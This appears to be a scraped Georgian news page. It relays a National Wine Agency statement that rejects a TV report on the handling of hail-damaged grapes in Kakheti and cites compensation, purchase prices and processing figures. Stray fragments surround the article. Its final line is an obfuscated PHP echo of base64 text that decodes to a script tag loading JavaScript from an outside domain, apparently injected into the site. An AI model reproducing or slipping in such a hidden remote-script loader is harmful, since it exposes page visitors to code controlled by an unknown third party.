celsiusi
ავერსი შნაიდერი
ღვინის ეროვნული სააგენტო ხაზგასმით აცხადებს, რომ ერთ-ერთი ტელეკომპანიის ეთერში გასულ სიუჟეტში გაჟღერებული ინფორმაცია, თითქოს მევენახეებს არ მიეცათ სტიქიის შედეგად დაზიანებული მოსავლის დაბინავების შესაძლებლობა, არის აბსოლუტური სიცრუე, - ამის შესახებ ღვინის ეროვნული სააგენტოს ინფორმაციაშია ნათქვამი.
 
ღვინის ეროვნული სააგენტო პოლიტიკოსებს მოუწოდებეს, რომ არ გაავრცელონ დეზინფორმაცია და არ შეეცადონ იმ „უპრეცედენტო თანადგომისა და მხარდაჭერის იგნორორებას, რასაც ბოლო წლებში, სახელმწიფო მეღვინეობა-მევენახეობის დარგის განვითარებისთვის ახორციელებს“.
 
„წელს, კახეთში რთველი წარმატებით ჩატარდება. ღვინის ეროვნული სააგენტო სრულ სიცრუეს უწოდებს ერთ-ერთი ტელეკომპანიის ეთერში გასულ ინფორმაციას, კახეთში რთველის ჩავარდნასთან დაკავშირებით.
 
აღსანიშნავია, რომ კახეთში რთველი ახლა იწყება. ყველა რესურსი მობილიზებულია, რათა ისევე როგორც გასულ წლებში, წელსაც რთველი ორგანიზებულად და წარმატებით ჩატარდეს.
 
კახეთის რეგიონში, ვენახები, ჯამურად 35 ათასამდე ჰექტარ ფართობზეა გაშენებული. ყურძნის მოსავლის ძირითადი ნაწილის დაბინავება, რეგიონის მასშტაბით, უახლოეს დღეებში დაიწყება და შეუფერხებლად წარიმართება.
 
26 აგვისტოს, ძლიერმა სეტყვამ და ქარმა, კახეთის რეგიონში, გურჯაანის, თელავისა და ყვარლის მუნიციპალიტეტებში, 4600 ჰა ფართობის ვენახები დააზიანა. დაზიანების ხარისხი სხვადასხვა ლოკაციაზე განსხვავებულია და 10%-დან 90%-მდე მერყეობს.
 
ღვინის ეროვნული სააგენტო ხაზგასმით აცხადებს, რომ ზემოაღნიშნული ტელეკომპანიის ეთერში გასულ სიუჟეტში გაჟღერებული ინფორმაცია, თითქოს მევენახეებს არ მიეცათ სტიქიის შედეგად დაზიანებული მოსავლის დაბინავების შესაძლებლობა, არის აბსოლუტური სიცრუე. სტიქიიდან მეორე დღეს, 27 აგვისტოს, საქართველოს პრემიერ-მინისტრის, ირაკლი ღარიბაშვილის დავალებით, სახელმწიფო საწარმომ შპს „მოსავლის მართვის კომპანიამ“ სამ ლოკაციაზე ორგანიზებულად დაიწყო სეტყვისგან დაზიანებული ყურძნის მიღება და მობილიზებული შეხვდა მოსავლის დაბინავების პროცესს.
 
მთავრობის გადაწყვეტილებით, მევენახეები, რომლებსაც სეტყვამ 100 %-ით გაუნადგურა მოსავალი ერთჯერადი კომპენსაციის სახით თითოეულ 1 ჰექტარ ფართობზე 3000 ლარს მიიღებენ. ხოლო, სეტყვის შედეგად დაზიანებული ყურძნის ჩაბარებას მევენახეები 3 სექტემბრის ჩათვლით შეძლებენ: 1 კგ რქაწითელს 0,80 ლარად და 1 კგ საფერავს - 1 ლარად.
 
ამასთან ერთად, უკვე დაწყებულია სეტყვისგან დაზარალებული აგროდაზღვევის სახელმწიფო პროგრამის ბენეფიციარების ზარალის დათვლა. სახელმწიფო დაზღვევის ბენეფიციარების მხრიდან, სადაზღვევო კომპანიებში შესულია 2500-ზე მეტი შეტყობინება. სახელმწიფო, ყველა კულტურაზე სადაზღვევო პოლისის 70%-ის, ხოლო ვაზზე - 50%-ის დაფინანსებას ახდენს.
 
გასულ სიუჟეტში, ასევე გაჟღერდა უერთიერთგამომრიცხავი ბრალდებები - ითქვა, რომ ხელისუფლება არ ეხმარება დაზარალებულ მევენახეებს, ერთ-ერთმა რესპონდენტმა, პოლიტიკოსმა კი, ხელისუფლების მხრიდან მიღებული დახმარების გადაწყვეტილება წინასაარჩევნოდ ფერმერების მოსყიდვად შეაფასა.
 
იმავე სიუჟეტში, საუბარი შეეხო საწარმოებთან არსებულ რიგებს. უნდა აღინიშნოს, რომ ყურძნის გადამუშავების აქტიურ ფაზაში გადასვლასთან ერთად, საწარმოებთან ყურძნის ჩაბარების მსურველთა გარკვეული რიგები, სამუშაო პროცესის ნაწილია.
 
30 აგვისტოს მონაცემებით, 27 აგვისტოდან დღემდე, გადამუშავებულია 2,2 ათასამდე ტონა დასეტყვილი ყურძენი, რომელიც ღვინის საწარმოებს 600-მდე მევენახემ ჩააბარა - მათი შემოსავალი 2 მლნ ლარს აღწევს.
 
ღვინის ეროვნული სააგენტო მოუწოდებს პოლიტიკოსებს, ნუ გაავრცელებენ დეზინფორმაციას და, ნუ შეეცდებიან იმ უპრეცედენტო თანადგომისა და მხარდაჭერის იგნორირებას, რასაც ბოლო წლებში, სახელმწიფო მეღვინეობა-მევენახეობის დარგის განვითარებისთვის ახორციელებს", - ნათქვამია ინფორმაციაში.
1146
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");